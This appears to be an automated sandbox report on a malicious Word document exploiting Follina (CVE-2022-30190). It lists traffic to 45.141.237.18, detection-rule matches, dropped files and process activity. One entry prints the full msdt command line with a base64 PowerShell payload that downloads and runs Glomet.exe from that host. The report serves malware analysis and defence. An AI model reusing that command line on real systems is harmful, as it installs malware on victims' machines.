      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://invites.office.com/
      Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.drString found in binary or memory: https://launchpad.net/bugs/1288690
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://lifecycle.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.windows.local
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://management.azure.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://management.azure.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.action.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.engagement.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://messaging.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ncus.contentsync.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://officeapps.live.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://onedrive.live.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://osi.office.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office365.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office365.com/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://roaming.edog.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://settings.outlook.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://staging.cortana.ai
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://tasks.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://wus2.contentsync.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: 45.141.237.18 Connection: Keep-Alive
      Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: 45.141.237.18 If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMT If-None-Match: "80119226a397d81:0" Connection: Keep-Alive
      Source: global traffic HTTP traffic detected: GET /icons/ubuntu-logo.png HTTP/1.1 Accept: */* Referer: http://45.141.237.18/Glomet.html Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 45.141.237.18 Connection: Keep-Alive
      Source: global traffic HTTP traffic detected: GET /Glomet.exe HTTP/1.1 Host: 45.141.237.18 Connection: Keep-Alive
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,29_2_004054B6

      System Summary

      Source: Document image extraction number: 0 Screenshot OCR: enable editing" to view content
      Source: Document image extraction number: 1 Screenshot OCR: enable editing" to view content
      Source: Screenshot number: 16 Screenshot OCR: enable editing" to view content Program Compatibility Troubleshooter Detecting issues Cancel
      Source: Screenshot number: 20 Screenshot OCR: enable editing" to view content Page 1 of 3 0 words Type here to search
      Source: Screenshot number: 24 Screenshot OCR: enable editing" to view content Program Compatibility Troubleshooter Cancel 0 words
      Source: Screenshot number: 28 Screenshot OCR: enable editing" to view content Program Compatibility Troubleshooter Cancel 0 words
      Source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: 0000000D.00000002.577239005.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: Process Memory Space: msdt.exe PID: 7084, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,29_2_004033B3
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_0040727F29_2_0040727F
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_00406AA829_2_00406AA8
      Source: api-ms-win-core-timezone-l1-1-0.dll.29.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-stdio-l1-1-0.dll.29.drStatic PE information: No import functions for PE file found
      Source: DiagPackage.dll.13.drStatic PE information: No import functions for PE file found
      Source: DiagPackage.dll.mui.13.drStatic PE information: No import functions for PE file found
      Source: MsMpRes.dll.29.drStatic PE information: No import functions for PE file found
      Source: DiagPackage.dll.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll
      Source: libmpdec-2.dll.29.drStatic PE information: Number of sections : 11 > 10
      Source: 20220714 DWG.docVirustotal: Detection: 8%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
      Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"
      Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"
      Source: unknown Process created: C:\ProgramData\Glomet.exe "C:\programdata\Glomet.exe"
      Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"
      Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
      Source: 20220714 DWG.doc.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\20220714 DWG.doc
      Source: C:\ProgramData\Glomet.exe Code function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,29_2_004033B3
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{3A2858FD-E981-4180-86E7-4C2D0F3F33EC} - OProcSessId.dat
      Source: classification engine Classification label: mal72.expl.winDOC@20/52@0/2
      Source: C:\ProgramData\Glomet.exe Code function: 29_2_00402173 CoCreateInstance,MultiByteToWideChar,29_2_00402173
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
      Source: C:\ProgramData\Glomet.exe Code function: 29_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,29_2_00404766
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_01
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
      Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
      Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\ProgramData\Glomet.exe Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Gratinr\Wr242\Boomerangernes\Hypercenosis
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.29.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr

      Data Obfuscation

      Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75"
      Source: libmpdec-2.dll.29.dr Static PE information: section name: .xdata
      Source: api-ms-win-core-timezone-l1-1-0.dll.29.dr Static PE information: 0xFC0D7D83 [Wed Jan 2 18:42:11 2104 UTC]
      Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
      Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
      Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
      Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dll
      Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_26d32acb-2999-4d66-b897-077572d4c005\DiagPackage.dll
      Source: C:\ProgramData\Glomet.exe File created: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll
